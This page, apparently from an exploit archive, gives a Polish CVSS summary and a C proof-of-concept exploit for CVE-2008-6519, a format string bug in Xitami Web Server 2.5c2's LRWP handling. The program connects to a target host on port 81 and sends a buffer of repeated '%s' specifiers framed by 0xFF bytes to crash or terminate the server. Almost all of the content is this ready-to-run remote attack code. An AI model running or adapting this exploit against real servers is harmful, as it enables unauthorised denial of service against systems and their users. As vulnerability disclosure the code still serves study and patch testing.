Xitami Web Server v2.5c2 LRWP Processing Format String PoC

2009.03.26

Credit: bratax

Risk: High

Local: No

Remote: Yes

CVE: CVE-2008-6519

CWE: CWE-134

Ogólna skala CVSS: 10/10

Znaczenie: 10/10

Łatwość wykorzystania: 10/10

Wymagany dostęp: Zdalny

Złożoność ataku: Niska

Autoryzacja: Nie wymagana

Wpływ na poufność: Pełny

Wpływ na integralność: Pełny

Wpływ na dostępność: Pełny

/**
 *
 * PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug
 * Advisory is available at: http://www.bratax.be/advisories/b013.html
 * (multiple vulnerabilities! check it out!)
 *
 * @author: bratax
 * @url: http://www.bratax.be/
 * @email: bratax@gmail.com
 *
 * Thanks to BuzzDee for learning me how to use reverse code engineering to
 * find bugs & thanks to DiabloHorn as well ;-)
 * Greetz to NR!
 *
**/

#include <stdio.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")
#define PORT 81 // target port

int main(int argc, char *argv[]){

  int sockfd;
  struct hostent *he;
  struct sockaddr_in their_addr;
  WSADATA wsaData;
  char formatstring[250];

  if (argc != 2){
    printf("\nXitami Web Server 2.5c2\n" );
    printf("Format String PoC by bratax - http://www.bratax.be/\n\n");
    printf("[+] tested on WinXP Pro SP2 & Vista\n");
    printf("[+] usage: %s <hostname>\n\n", argv[0]);
    return -1;
  }

    if (WSAStartup(MAKEWORD(1, 1), &wsaData) != 0) {
    fprintf(stderr, "WSAStartup failed.\n");
    return -1;
  }

  if ((he=gethostbyname(argv[1])) == NULL){  // get the host info
    perror("gethoscattbyname");
    return -1;
  }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
    perror("socket");
    return -1;
  }

  their_addr.sin_family = AF_INET;  // host byte order
  their_addr.sin_port = htons(PORT);  // short, network byte order
  their_addr.sin_addr = *((struct in_addr *)he->h_addr);
  memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the struct

  if (connect(sockfd, (struct sockaddr *)&their_addr,sizeof(struct sockaddr)) == -1){
    printf("[-] Connect failed.\n");
    closesocket(sockfd);
    return -1;
  }

  printf("[+] Server is listening...\n");

  Sleep(1000);

  /*
    setup format string request:
              %s*100 + \xFF + somestring + \xFF     (program termination)
    or:
              %n + \xFF + somestring + \xFF         (program crash)
  */

  memset(formatstring,'\x41', sizeof(formatstring));
  for (int i = 0; i<200; i+=2){
    memcpy(formatstring+i, "%s", 2);
  }
  memcpy(formatstring+200, "\xFF", 1);
  memcpy(formatstring+249, "\xFF", 1);

  printf("[+] Sending format string request...");
  Sleep(2000);

  if (send(sockfd,formatstring,sizeof(formatstring),0) == -1) {
    Sleep(2000);
    printf("failed! Exiting...\n");
    closesocket(sockfd);
    WSACleanup();
    return -1;
  }

  Sleep(2000);
  closesocket(sockfd);
  printf("done.\n");


  return 0;
}

Referencje:

http://xforce.iss.net/xforce/xfdb/41644

http://www.securityfocus.com/bid/28603

http://www.milw0rm.com/exploits/5354

http://www.bratax.be/advisories/b013.html

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Xitami Web Server v2.5c2 LRWP Processing Format String PoC

Referencje:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.